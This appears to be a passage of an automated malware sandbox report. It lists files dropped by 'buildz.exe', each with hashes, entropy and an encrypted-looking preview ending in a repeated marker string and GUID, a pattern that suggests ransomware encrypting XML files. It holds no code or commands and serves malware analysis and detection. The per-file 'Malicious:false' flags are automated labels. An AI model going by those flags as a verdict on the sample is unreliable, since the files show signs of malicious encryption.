                        SHA1:81053E3E24AEBE31BA9EC412E4FDDE08E757CB6F
                        SHA-256:D2221D9B24E04AB5C7165D9E239819DB0408CF530411482F0A6E2D6A7451DE08
                        SHA-512:382A079AD85AEC6F1B19C85050C300C0BDBAA64B007885E88F6029C6973960EA0111C10B4AFBC14D2B4A70B046FB37628EBC7405CF830777723E8AA5606376D1
                        Malicious:false
                        Preview:<?xml.V.^.....D..6v.@.>.......6&.i.CD........f1.Ox^...P..'.,e..T.+ .q....f..>..).....,w...KX...k..p-..F.)..Hw.y.....1.s..@Q.d...,....sU*....Z.}.?/({kED.S.`...m...Pzl...1...>T..vTe]...og.......W?.G..&....P*..p.j0.Zy.U...t......_HxR.9.K..%.p........<..5.=.Z...$T._n.o...K...r[..k..f..+.$&c...5lqJf..Z.a.s.6..../}V/&.......f.qbgZ5..50~m(OP.c.q..p..J.....`.G....N...w..Zx.w.X.o>.c..'e....e.d.....HF..'.7.V....).Y.t....\.Fh&,....].L. .w........._..g...-....?..<iTJ;..E.p<...^..:.....\....?R.kUZ.....".ql..(...fz..lX.f....i6.dOY.r.....N..P]b".T..?.9-..m....k...@..U1..3..n..S;z.+.S.......T.t.P.*..$.~...A.}o.?K$.e}.st0,....J.0.....1Qwc.........L..8I6w.x..>...(...R.<.g./."..!B}k.7.8.E.1...IG.......@.?l...M..[...f.......E.)0V...O.9..p.......T3..r"...Y.. c.XGLW...9....=.7.....xeY..-.q...DP%K....W-.W..!.<.qz1..g.....!I.Q..3L[=q...q...V`l.B.@E.8...._C........A..6.R..].h...*9c.[....N..W.4bn.?....,......gb0....F..kgF..n!GK....up..3.B^.l..H...<....8b
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1155
                        Entropy (8bit):7.814058081759706
                        Encrypted:false
                        SSDEEP:24:7BTzCkD2xlsPVY72mrzFu8yDESXkXAT2mr5XSBqsqrD+7216U/eBsGbD:9TJ2DgVYSmdu88ESoA62Vsm+K1fWuUD
                        MD5:85BA11416E19E50EE754BF3F802907C6
                        SHA1:755F6176CE390AE3645E718F76A93F0F631B91D2
                        SHA-256:1CD2A8FBA638967B108143F057A144447AFD2ACD2EBDC88AFB9C8DEFE31970BE
                        SHA-512:ADD3798E968EB17BEA20B144C6E8FE8FF005104A9102C6D39119A03B53595D4E8AF6F2242C884AF53C18CB50442F1E2AE6785D6D138C186F7B6C7F92A382A85A
                        Malicious:false
                        Preview:<?xml.......c.pxR...nC.%..4L..S.....!.\g.t0A........[..l5..'.TIC,w.U.9cBO.-...3..u..J.V...l.....5..5k.7,............z.! .Y....L..q...5):.+.d.U... Y.........9j....v.N..HR.......h....o....B.)....dD.K..C......1......l<..P3...$......Cf.....r.Y0.B...B. ...=..A.;T......F...F..G.l..wsV.b.....y...+..P.@.......g.......EL...r.5O.Vw...C.4....c.C2.}..O.......{...\.z... .......w.L........)..).Nv....8'j8.....4.V....mv..gm...u..@.w..M.....C.._!.......]Y.9B....f{..x..u..RE.....qA.i.8...6..........WR....G. o..Y.....P......Hqy.E>;...3..N.m... h.....o.'..l{".@y..7..5To..J..?.w..r.n.. I"b.....~....w.i..x%C.[.8.uG.G.....9..z..%...n.Mh..N..\......,...J.p...... ...f.l4.H.J...o?9`.j*.*}?....)w'(.D......eN...+;bZ...k.....6}..k..ol}...)..2~./...Wi;..C<..I.@'.k.(..V9...;KE8%Ik~5.d..\m.....5..2...L.\(.OK.0...Z(Qr.....~..#.....EnV.S>S.?...U............X.......h3y..u..Td9..%..w....@.n.M.?.u....PT.).......^.|a..3j........wT....7"..ch..s.m.....u.p....GL.*9
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):715
                        Entropy (8bit):7.66294705695264
                        Encrypted:false
                        SSDEEP:12:C6ekXYyJbY+iCZJcK1kjH5+Bmb/wML1rLh90EVxPm/CtNRyJG0d68Ib26Gcii9a:CrkXYy1Y+fZKKqQgwMhnkOIC0U0d68IE
                        MD5:5A93E6CEADEBAFA67EDEBC414295277A
                        SHA1:1732DDBF2369219523B552578FDF44738638EEAE
                        SHA-256:955E889D28DD8E3F6988B81A528E39375EA1B8B457AC06E89F78C2D7CE66E7D2
                        SHA-512:D69E84CBDF97CC27F91556ADA5C61A5BBD6E403E9921BF51C4DAED4E9C2F5643DF8A7BAF4D87198713708C8B606A88C10662ABA94781355140BF017202AFAE5C
                        Malicious:false
                        Preview:<?xml.o.q*...z?..Ru..=.Q...U.KD.P..4.../;....I*..V|.F@Ek......\=(.y....].$..`.GY\.pslV.wmC.d.i.p..>.R.9.P...?....+.H..E.&...HH..(...u....C%]&E|.i..Q..(.$.O...#.g.-..~9.....]..F...].....:X.-H...t..'.(\.6..I.J..6l.e..cp:...b.g.SM.......l._...:<..pVm.Q.j...Q... ..yw.Z....}BW;.p.2..wx...C......m.f.[..r.......|..,.C.BI/X.o..R..i..H.}.......{.....O..$+5....G.r........+;.V....b.../.......35......0..5.........f....M..Uy6U...t.....F..!i.D*...6.l/..^3Z#...Y.9.X.V.m...d.'piV.Wl.....qR.G....[.m........6.C..<n.fh.b...D.......M.w...io&..5x.Q.q..u....3_......6....F.u.7..q..[....}....C..|.[....d...qKX.U.."P...4..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1398
                        Entropy (8bit):7.837514947728954
                        Encrypted:false
                        SSDEEP:24:dsb9W3FpVfYl0xb0zE8uEYQbsWec3/bptspc683ZfyAEbD8zeAR9lYHGbD:+p+FpVfYyb0CQ4Wec3/vEAEn6ROUD
                        MD5:004D8ECBBA9C625393B3B83391B2A226
                        SHA1:9510D58683950F3A900CCEAFD3FEFD463B50510B
                        SHA-256:4EB41D60C1A0922DAE259B6BCC631672A29BDD6194BA6EB879C94402159D16B3
                        SHA-512:0C9A81ED50FCA02D521B0FC73921253AE8B33FBDC4EF1E1405E8EB969F55900024EBE5B861A97F95C5190D8A74A00B60E2420DF1CF0A6EE03DCA986B4693FC98
                        Malicious:false
                        Preview:<?xml1..J*.,.*.*.A\.....P.?6.Ij..l.j.j+..G...R(JY..[.......-..m.T.....HQ..8.G.!JC..v.}...Z.b!.3Q;....S...M.G:......5..de2....../.....e.<...h.....o.O....V..N.&.)...&.-$..y=J....o..[.??M...c.......a......T1.H....Cv...H......K*;?L1.U#.s..+.D.....".....8.r....o.B...O..>.u4I...l.?5...de.3Pn.E.f.w].LB]S~.0F#..^r....g.L;Z.`.)..&...........s...F...%EB.K(.#A{.).#..Y..m...d..s|..".[p..*8r.1.0.o......V..V.bK.@i......J/..B....=..W....g....U..[N.z.r.jZ....}L.+(..`.P.."..\C.UO..>...y.99..{..%_.9...1}.kw<..H....?..JdTkT@..>(GY..V...5oq..y:..].....8e......6.3..e=5(D.0`...>di).....i.(...^...C..'(}.a..H.m..Z-...-...R83:..GT.G....k....G.\.d...u......\.{.s?{|....#.WdB2...n..^&.d.'[9~o w'....Y+&.<6.\C.....70.. .............N..%....h....).R[.\...z.U.$^...F.v.!v..5..2`.20\..&...!|n............7.TQ.}.....A....F.8.(rN .......................0.Ei..Moj=.%.?.j.G..Q..h1.o...Pp..G....-R..U...1.....2'...Q.&a..F..I.H.%B.....>.0).(>..|..P.{.....&....8..^y..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1008
                        Entropy (8bit):7.806008789457924
                        Encrypted:false
                        SSDEEP:24:Dg4Rmm5HJZFSlGnA3NZu/lby5Ptz+bXZgWl/GbD:04Ym5JZFSlSCOlW1tKbX+Wl/UD
                        MD5:8667C31C2097E261B487AFAD8D7B2A94
                        SHA1:300B134F2AE19E1542D5559E6C6464516075497F
                        SHA-256:2F8D952102F593D4A8803F5507C9C2DE471B35E16F90BB968A9C3AE23AD5BF49
                        SHA-512:2D192C61D7597A80D45431AC041A8B69CFD703C6E461644AFBF0A415FA9B948D6DB7ADF7612F5083811E100919C53F199FA8BA16DEFEB214904E78640B414ADA
                        Malicious:false
                        Preview:<?xml..MP....}jD.h.w...WA!%.ML.8...Y.s.Z..PO...@...tQ.._.....x...u...[y'.$...#....C.......;.9.[wnd?#LW[..`."...6Ef..d..3...oW..7.._y..9..^.^.G?N..}..#.$.L....;..FG-..k...w.....hrs..K..:..Q.(0...6,.e..=...............ZO.D..eU.....n..;h....[.._..].sc6-.].S]..m.G*.a..,..y.{..{(.......S.....-........<.2....`..... V....r\..Ojx......I.%...t3....5.....-/`.....U$.:.s.Fw.u.lL.zi`qu.>...9lD.gW...$.4.]N..g.....tx..Z{:.R...WOfq.~1.uIq........T...{o.= .?+...V.)_..Zq..I.-.......mz...x.g.*..B;.}.w.....@1..C...*....m...B.Z.....C...4..:xe.x.y..[..^=.~.-.s...7.... .....@I......"}.Vu>4.....5.-...{.&W?............X..w..=.......X..Xb..K~.7..m1.8.T.h.)}...1u....6Z.....J.\c.c0.5.R.(..'$p.q..-.....d.eo..._Q.r...$...-@5z8.m...P..3d|p6....a..n#b......+Y3,ru......A3.9...l.....,...L./.>0..8.I... .>.+0..m.....l.o.]..`;.B...+!k#yc...Xg.I.y.1{_...[*..v.....G=..e....FVJ.Z.bT.._.i.W...1p...c.g*!.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):719
                        Entropy (8bit):7.692410734666876
                        Encrypted:false
                        SSDEEP:12:6H5aKWat830Gp1F5kg/vwLejCkTZDk8gXmT/bD3SIB+TET3QU26Gcii9a:6ab4GwLejCaZDJMC/wTI5GbD
                        MD5:BBFC3B133B1CC8E35690699BCD32CE02
                        SHA1:2F06AFAD5968E1A4990EBAE6902981ABADE54D09
                        SHA-256:92D30CA74ED3CF94A88688B292B3299E8DBE2158D9DE5B40C84D97A243D07F60
                        SHA-512:A1A1F72C0EFF15B9D7C85C44115A33C0F2AD4F1A8498D735C27B1E0DD44A41CC701370393A0D6DE8E1A89198070799A919A015FBDD36A3BE82176ACA44B44943
                        Malicious:false
                        Preview:<?xml..0}....'v..:...@$.bF..........^.}.S#.....0`7...A[.b.......XR.>-3..(/q.5Q...i .GZ..C.)......m..8....5F)...@.}I.Y....../..dg!...H........Y"e..E.Q...A..@..J.y..4.......^.m..V...a..}..J+.P.....:..W.........B...P[.!.oa'W.u.V.y....G.....k..<.j..+H(..4..2..i%.C#.![..o.<.h.HC..M.6..2X<...`...j......S..;R.6....]l...A.w~..o.S....z2.y...ce..kn... ..........T.B..b.....@./..ia$l..;.."!......I`K/......3..|...K;.}?L.b...Fv.9b....pd..%......7h%.U.L.,.d..i*.M.......A#.<.@.}.g1..W.\...Z.G....\.B.S.\..$...n@..D....,. ....m..4pP...}..?p]sT..`..kN..V...Y.../.c^(.A9......d..m..r.r..<.A.J):.......s......}..y........EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):793
                        Entropy (8bit):7.718051422630078
                        Encrypted:false
                        SSDEEP:12:ayzuKC0mav/409CnZVQbM68s+57uNv0glygEc4hs1sOtLvMPg/tb/26Gcii9a:cKyav59C8oZ19uNv0h0faOm8tDGbD
                        MD5:A7AE5F5DC292F7470AACF0A145BF5FDA
                        SHA1:B97E302837E42D77FA6978078F77DF05028AEF57
                        SHA-256:A43246E23F4902228938954477CFC50B8E0DC3E7EEE7529E39D22F6E64924922
                        SHA-512:CF78FAEDB7D1A0D29B2A23642BEEA6BC14E4B71F219E024C5B668A9F2032C95C2A6EDE4757460465A0A7BD28D0A10AF5698641844742EDFF14573AE96A7B4371
                        Malicious:false
                        Preview:<?xml.E_ q'..\&p[......4.o....(.e.Vtfp..W.;....=.(Ua.9%k=...z8.T5.{.\G.MV.Od..^R...e.fU._ f.p..p.l.g....fpP.^..z.tE..;.SN.....\'.X...J...9..g.&.Og.3.,.....#R........:...B....u..~l..1E...7.N'#.7.U.w...%..X..c... s...A.....l.W..:...3..N..cV.=......s.......0"i.r..q...Y.........qv...>.H......$[;*e..6,..aQt?..N.....y...w..u..r..^....b.3u.PDV...m.....R......"J.H1.US.0..8..$.P....q..GM..8..$.A...!.>}.Ue...u..^...(!..;.J......#.....q....;E......4. .Fk..x.:.d.g....v..;......w..U..q.yA......R.ap..9'.vRs...U..q.....88"]$........~...e[..w.+.........9{...":..f...D..<..c.E..MX.......2..|.h..T`........9..W......d.....GU.v4dN.....L.F..b....0.+......fc.Y..#e.M....EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):761
                        Entropy (8bit):7.699548228553788
                        Encrypted:false
                        SSDEEP:12:0Av8fnUhhxdEBNGJzWkwSF+P0qFCKCiBTvlKlsKzIPE3qtB/uumZ2CY/26Gcii9a:bvK0ws9WRSgMqFC8dvVy3qtB/uusZ2GX
                        MD5:91D9342975B806F5BDADB2950D4D76A6
                        SHA1:10836CCE18B932C50B455F675CD9F89127B03B88
                        SHA-256:644E3845BD5D2D857B591AAADA28BD979E4404B72CADE2C74C1F192CA31928DD
                        SHA-512:57DF2837A3E8DC8B0200348125073002A184FB9F869762F7656CA96EBFE7EFF3105E2DE650F33C233DFAF57F181B55CC084E696EB647140D398AA2DF2E1F6B3F
                        Malicious:false
                        Preview:<?xml.<..../.?........Q..E.Z#..g.C..AB..o%t...Y...........)+.^BW.\..w.+q.C..v.M.BG..W...}..D..P.RwF....Y'..k2+.3..NZp"..M...W.9".l.{.+pP...j2{.O...7x..e.b.....q.g..9$_J...!.(.....{.[)].#..&.,....(5^.kK.......L..<.Q......w2.`..`..._!t....iB.).,&uM.....Z4...........N.Pw.^...]!.G1.N...q..XR.V.-~..@....\.7....d}j.......o..\b.....M....]..Rn..ueE....rH.!C."..r..^.\U....}.%.e....7....n...4.....JC..mw..<...,g;.-..@.+.(y.X...\......H...`l."......S3.)K.......W.....B........U..h?.....tw.....K-$..X.....D./.....[.S..q..x.'j4R.P..@z.;.\.~.O.`..G...I....... ..*..:.!.1nfU...8.Ov....%H..5....D...;.`4....-U......."i=.../...;Gs...X.[.&d.....?.bE..Z.......(...Y,R.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1306
                        Entropy (8bit):7.823238844645431
                        Encrypted:false
                        SSDEEP:24:jgG4db+HXwPKXbRHzMbjBNl+qRvGJ0pKMUIpVEBGIzrfcNVU8W8jGbD:jgGKyXEcoEqRvRuI0DrfcDU8W8jUD
                        MD5:A924308E93C7687091095CA58CEA2F77
                        SHA1:4D87FE1D19FF253D178B63C5C4511C5101D0FD9C
                        SHA-256:AE8507FF6EE0F49868D9EA7FD36B26F2B36039822E539A314C87B679DA35013E
                        SHA-512:EC9A7277463A4325BFE30E17F50068034F4842A72F6DC7C68688715EC070CF638DD722FC26683913DFDCC912E8F63BE23C0CE3C571D21D676370192B00E70670
                        Malicious:false
                        Preview:<?xmlA}...^..e..K/...\9,...}.......1c>...E......#.>.T.1.+.../..S...Y.......\.v......6..!O.._*k'._=.....e.V\:.K..L|..7.C.q.0..x......a|D...~U.V...b.J.(.y.PU.../6.3.....@..<o.y^W<h..l$n..xo.`.D..9.....@.B._.c....+.....;..$?L_|..9... ...._....,*U..n.Lw..7O:.vv\1...@.f..~.rXV...3.z..D...P.. KX..:*....5..e.\4a?.e....#._~.......Ja..$.f.>.caY.....'.....u..I..).\.Z:Bl..r......}..x..*....tXE~.!..cFV4....{3:.D:..O.#-.....XF....*....I._.dQ..0>^.../..DT..B..zQ.sf$....2~..N........K..I..`..'t...B[MpmJ....K'.G................!.#8-+U..t.w.U."Q:.2.+.Z.b.V..Jx_Y..Uq.3.$..WE1R..D.3i.9.....v.x.T....q/~.$....d........\..B-->Q.....r...7..3....Z.4p.P.k../.......4..D....J.j6..p..I.v..s.x..t2J^Nx..b...(A...-...;..V(....0..!c|.v%.<.`.....T_.Z.,....lA.w=.r.,...Q....VJU.+..G..{.c....bp.........o.M....].v.H).@V\v..A...".d ;.....=.........^.Wk.nq.#......h7....>&t..l.....Y...,!^.$.'..(.#+a..8O..7.{@.l.uze.I.. ;......<b......H......5..V.xUI.e.B...D'.YO$7.g......d<$..8.qV.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):4285
                        Entropy (8bit):7.960423758437864
                        Encrypted:false
                        SSDEEP:96:YTQQYR3+c5lMJxxwiclzerhiGPiT7yOg3hkDfyUgyP2cD/mDhkA:YMzugiwWhgJg3WF2cD/m1kA
                        MD5:B0DC2655192FC1719BAA11F1CB16930E
                        SHA1:B34287F5743437F10ABA30CDD2D30135AEB28313
                        SHA-256:97068DEE9B719BA35A87F4D5E50765E138C7AB019029377B700BEDDE0BA0C05D
                        SHA-512:0532603F393F9AC6C6273826165874C79CDBA2CE42D938725613C6EEA4B7F11EAFCC606074F71648FB07FAC10880AF7EBC849037C33D41F762FC1E8D2BB2ADBB
                        Malicious:false
                        Preview:<?xml.........r.v.?r?l........S..4..Z.a.7......vM..c.b...Z...R...l...k\!..S..r..B....Xb..`."GhEK)...L..H.....'...e..X~{.....d=..1. ..{3`.f[........_.6u'....$.<...........U.!.0%g.AzcL....]..mP.!.wK....M..l.......*.d=..e.....@*...6y.}.d.."..f.u..Z....#...]Yb....A.v....^...z....A4n.3.H..ms..F|.?...~%._...3....e...H.E=.91....k..[."Zw..+.A...,..3q\...K....D.q...<..........%.0j...~.^..Ty...1..'p..<y.w.....-|....~..n,[.p.}*..L\..t..9..J......Z.-O......o.7)4.B..^.B<.Q.o.....NfcU...F8............znm...V;%...z...U3-....'R....Y...y..B..J...;}]...@...S[ .l3..+....R...H...w........0...@.>......m.W...RG\5b.9..y..+-k..GS......2....ht..N.I.t.I<w.......^..N....'.mkXjr.O.......0..(a.1g!...i`.)z.X6..e....h~u..M:.N..jJ...;..{&...[e=,.n.i$D.'.v.t;@.s..f0.*;..b...L..5.).3..40..8.#[.n+........B..I....4.(...M]....L..c..h...U"._.o._..h..y\.u.l.}...HZB,..N@..U..x.....l{..."....%.0...9c1/.=..Zm..'.......h...'..8A....2N.w....F,..^g.#.S.s..q..../....(.#x..zi...ND9...y.}.,I.J..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):854
                        Entropy (8bit):7.746882550466388
                        Encrypted:false
                        SSDEEP:12:h+zj+pJ6mP72ixtdPa59gEkxAo2Xw2ZRBMvf6CJDLPJyKrtW4RAxEt26Gcii9a:4n+JXxt5c2EkoXw2ROvyqLPwuA9xAGbD
                        MD5:E4ED4F9E368BEF5DCC5E0DA3333BF32C
                        SHA1:434226B73E68FC4EE3D09DF0A428820E73A8274C
                        SHA-256:C3F78086787286EB35CE34BAE37336900A7C5EC7BF5BCF147BC5E960DE68FD4E
                        SHA-512:639A8464AB89EDC257A525D766B1BF67AED577A21542FF42ED1A7DD84A0FA471ED409F08B06890C33C0EE8FCB17FD2F1CA8E8B339FD0F4AAA4BE78B4F8F93323
                        Malicious:false
                        Preview:<?xml...:m...{....=..D...X.....$F}.U.;......N(n.W.?......j..7PF...rA.k.......L.(d./J[..6..3qS<.]...v3..~....M". .>..Mq..U...K..E.r.'.....}.....:..rJ@`h]...f.z^.y..kA.2.....#.F:'...>....1....O...2.^M........H.&..U..+../.J.N.].........o.v2.;.+.l...A.U.-..?..G.......V.i.T...5.4...P..MYi........._...4............@L..%.{..!7.R..3%...H...#Ca.{+..lq.._V.<.0~B.Ke.u...n..H.q:.......r......J.P......Q..?...;.b6p....3.f.\..T.&.4....}.+..c..i.......>...>[.........@.4f.<@..L......=....a?.~..4.l.. B.="...,i{I.... ..k...@O}.......[/...|.a.1V..,.*E.(...u..{.........f...!..th .....DX.p.q]...R..9.v.&tG.t...Ke...L%F.~H.|...\....Dn..M..[A........Gl..0.3UL.....#..{...Q....?..Z.<.o.....n....k.Z>.}..}U.-.[..L..g..P..$.a....w...A$..s..u..p3.M.q.x.U.ht.....4.uEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):929
                        Entropy (8bit):7.698548651863424
                        Encrypted:false
                        SSDEEP:24:YawxGRDmF96uRrPlt2wIyWcr27nbfsTDB1+0JoxGbD:SGc6uRrdArcr+rspwBxUD
                        MD5:DA6BE2C1527F0F5F8C79C7D6A948EE2B
                        SHA1:B2A0199AB45B787C1210179C23C8B27A0C82A10C
                        SHA-256:0DC053F2AF8EA4A55FB7FFBEFB1E3312F99D753AF9F2CF5EF5068C3B69E88600
                        SHA-512:8D88B0D3D228F907D4CB08EDC55D6988490F31E85CD7C1ED8CFEC2190A7ED459B6653C54F3AA4F6304C14BB2805220DD1C88E873C4F9E3B3BB2C09D2BD5BB367
                        Malicious:false
                        Preview:<?xml%E....z..U..<P.7PF..W}N....+..._c.[?...x...%/..w.E..0....%E.LC..!g.tf.......Py).....b.g.X..5...L.w.z!.f.......v`D...G5.v.f..Wj5._V.)p=F..W.(.E....1k.R....Ci........9..)...o.3.^)......4.l..).;.)....V...E.P..Zu.....N.`~...6...W#...y....l.i.z'..y...>..{....E..D.k.z4i..a..qu..##N..4..w.7...DdU|...g2..[..}D.....^....l..a.a..e...y...b.....Hf.?..Y..+A.U..a.5..`S.:..n^.]..:.&.E2..IY).6..\.Vp......&.L*..M9K..%k.".n..7...Ox[fL...q(q...`>A....K...5.._..QY.p...@.?.q.i.xweqHkz...7l..l#>.?.q..D.E.}.#.aNe.v>P..;@..<..#%MfR...F.rw3LI}@76iu.Pq).5n.z.f......e.9...x.0..B:z_%.4]IE*Tp>..~..H......c..k......8..'..NF.......8.e.]..../P:.^'.NOv..\..(......^>.x..u.bl.....(.$...e..{`........=##E.vCx...7q.......kzm.G,...wc....?px.L..... .......6y....`...?.l..y6<E...q....h.r.[.1T....\.#&w.s...;...~..R.o{al..X~6...n..]...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):722
                        Entropy (8bit):7.642427012842156
                        Encrypted:false
                        SSDEEP:12:I2RxdHz6Vvk3v4xYm7HCu3eHaYean+qQAZBXy46Bt1+0m26Gcii9a:I2XdT0kfdm7HCu3eHu2+qQAZBXy46r17
                        MD5:4360011064B3CBC07D099C35C8E03EE2
                        SHA1:254DFD224BBADA3AC552582DD7B2194AD557607D
                        SHA-256:317D2DAAF1DF1BA012B0619D3A7ED3547D62089A35349BBB19D67C90356554AC
                        SHA-512:6340E11BEF07F3CA39491C2BA0FCA6E1EB6F6EDC98D763092B9D800C213F139084E3281F61BEE2A2DB8ABE9086E3F16BA1C22C9F021921752CE7D4EC22193EC2
                        Malicious:false
                        Preview:<?xml.qH....<.L..m..a.-Q.|!...E.......O......#a.n'.X`..C.l...m.....%./.jH...l....5..D.?H....c..&i.B.. ..n.l..)..n..5....<..ODO.nt..PV....)..A...X./n%.*.}.C3.|...F.(K.4.g..A."4..7e{5z.^.\...a..rh/.j.....v... ..)......'K..K..*|8_...4....!s.l.\y ,....)o...i....&W.....\...{.U..~..,.....rv....0::.'n.7.*9./.{N...H%P..A_......C.o.Ds.._$q$qQ....i.i..5....{...I..)<..!(.%......P.zE..UrX.7..Ty...*..... Z.....VX.Z..<&..v...<\8..En..c~.._...N...S...v.m.'^.).3....6............K....4..M....v.l.Dj.8g..6b.m<....]..k.'...0.%..cs...!.e...>...b.>.J.4.t).2.[..e..C..MW.._.i..i.......u.{..l....%U.:b.0..~I.#}<.M...8.I3...=.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):935
                        Entropy (8bit):7.767073716310471
                        Encrypted:false
                        SSDEEP:24:tBAXX6ui9OJGkGHVUaRxNoPgORywMYsex7vGbD:PAlqOg/XRxNTOPP/5vUD
                        MD5:E386913B083323C6489D6D3F451B625D
                        SHA1:4083E5572792CAA77358119B1867FF217C3A7416
                        SHA-256:4DE802E6B8AE5E05741D37CEAA0C2BAD1B795CE6489FA802A1226B33E721ECCF
                        SHA-512:4A5F94BBA0B1EBF143C7C08EFBC9B39749E6FCD71D75092BFCF838E0C8216B817E8B54418E2902439B5173B57F8414BF25B72639628F6BDA8828EACEF7ECD6FF
                        Malicious:false
                        Preview:<?xml.....,.....u........v....L......,........n.=..p..1@.......z.~M.....@jKR.>...&..8.yN....un.S...NI.2.r.5.C..`......`.].".X>.,..:{....:.ZUDljPA..j@....^.E..*W.o7.I......Q..3..qv2.ikW...E.Y..I,.^S_...]v..F.m....Z.2.A.....=...}.l.Ox..G.......}.....S.A....:../.c.U`.4y...%n4....+.J=a...r.HG.......C.......A.4d...1$.mu'.5.n.x......}.........\....I;..Zo..N{4.....@.L.OG...Q..iOHI\.........$.t..b..W.....E...0-.?..tH..6K.C......~0#.t.u..#qx.f.......{...[......}.m....g...r.K....Gg..sa...e.[........Ipf..ZT......dOSZN.|U6I._.+<....RK.yX(.^{.:Lf...\.-.\.%.i...;.V......C..f..~.w'i..q.QJb..F3G...5.].[.7..Xt..V.0.g..5..Ma5......G3...;D.f.?.....b..dZ..gR...N....kK2.gq|.5.}^.q.K...<.}]Py.*$....g....h...I.5.Q..S...+..[;....>.....;..$p.B.u.p..8...%.1|..y.RY..... M.Y..7.g....=/.g{...s.W}.)..O.#O......h|..QUr..1...^..N....pEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1357
                        Entropy (8bit):7.851403903281848
                        Encrypted:false
                        SSDEEP:24:dIWQYXttJnBOsVz0oq7FxdApnQqbeUW2vpIoKU8sLijJbpe3xDltW2i1N7w5GbD:2WQYdtJUsVrq9eXeUW2hK0mjLg5+L0UD
                        MD5:25861CB99541A93CDE473681E454C176
                        SHA1:073D535EC78BB0BB3E6FC30708D3A7304EEB0F60
                        SHA-256:EB9C463401142D10D005E1F7FD90FB5736240248AEDC360ED895A6EA210B531E
                        SHA-512:B10DC72951391E5A46214F6114FAC7B81A1844156C1DF385FBFA69C7CB969A7122D97CEC16DA80DF6886F2B431ACB295BC98282BF688ECEFD396F7078CEF6D05
                        Malicious:false
                        Preview:<?xml..L.).....s]..ax..8.z..z..._.h.tn....`/gG~z.doc.b.....9........CL.z.k:.2i<...k"f(..p.P.XW....=.....T..*(.1....wU.y.gg...#W.$.{.<....rC7....%..-..).!Je. N.`..."(..y....._..:.8.7. RmbJ..........e...G.Jm2_..E....t.5..\>'......M.6h.zA...Y.!....".....7..\F.0.U.uJ.........1l..........O.cC.[.H..m: .^.h(.8..$w.q..#-g...>|..\N.Z...V...B7..c.O....`..H..&...'..a$.. ..x?F.Ut..5..!v...7.Q....c.y..X.qW(k....;.....NNG........_..0Cz...*.UqL..M..akU............W..n."X.D.\....vPP$...h.I3}o....M.#..A.../.`=..&<E..._..#"...E..m6.;'..jY...<b.t...C.+..@SC..e..M.9H.....?.......j=.x........+.0.mk+._.../Y........k..S)q......(.nR...v....)....u......f...l=&..^z..v.\.....k!.h..o.,b6_..:.u#.~."D..M.Ux...a..N...k.P.W*=..B...'.@.e..,e.3../=.s....[t.p...YQ.D.b*.O[A...............}..., &....Dbd!....&s...K....P.xL....b....#...A.....SK...q)....K....e9.v?.Z..a.X.I.$.D...&bk..[...........2.._...y]......T`..6....,#...-...[.T. m..IM_.:!.z.8N...a..c..Tu..........
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):732
                        Entropy (8bit):7.627938487483823
                        Encrypted:false
                        SSDEEP:12:A837tZjtdgMe/i3yZMJxgP6kMuuirfkbWGK0/RmgjG3nsGDZwoYZ2v2R/26Gciik:xLHjj13rJKP7pWnXRmgy3/Fwo0VGbD
                        MD5:99CB679CA72FE3DAC1817BE4ABEECBD3
                        SHA1:7ECD499BD082F350684EBF2CA25155A8B0AA3E3C
                        SHA-256:37F05E67832A269987828666BB705AA826F6113A7BF4E0834DDD2CD6196F7280
                        SHA-512:89CD4684030E990D5C84478B35D98520F49E37F9113D1BBB4DA195FBABC36E1A37D9CD8F675C3D637911765DCB594822D6DC5F583B1B94BFF0333C3A809631E0
                        Malicious:false
